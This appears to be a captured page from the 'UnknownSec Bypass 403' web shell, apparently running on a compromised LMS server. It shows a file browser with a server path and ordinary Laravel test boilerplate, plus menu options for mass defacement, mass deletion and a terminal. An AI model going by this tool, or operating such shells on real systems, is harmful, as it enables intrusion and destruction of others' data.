UnknownSec Bypass
403
:
/
mnt
/
lmsestudio-instance-vol002
/
lms_3cd623894623
/
tests
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
TestCase.php
<?php class TestCase extends Illuminate\Foundation\Testing\TestCase { protected $baseUrl=''; /** * Creates the application. * * @return \Illuminate\Foundation\Application */ public function createApplication() { $app = require __DIR__ . '/../bootstrap/app.php'; $app->make('Illuminate\Contracts\Console\Kernel')->bootstrap(); return $app; } }
Copyright © 2026 - UnknownSec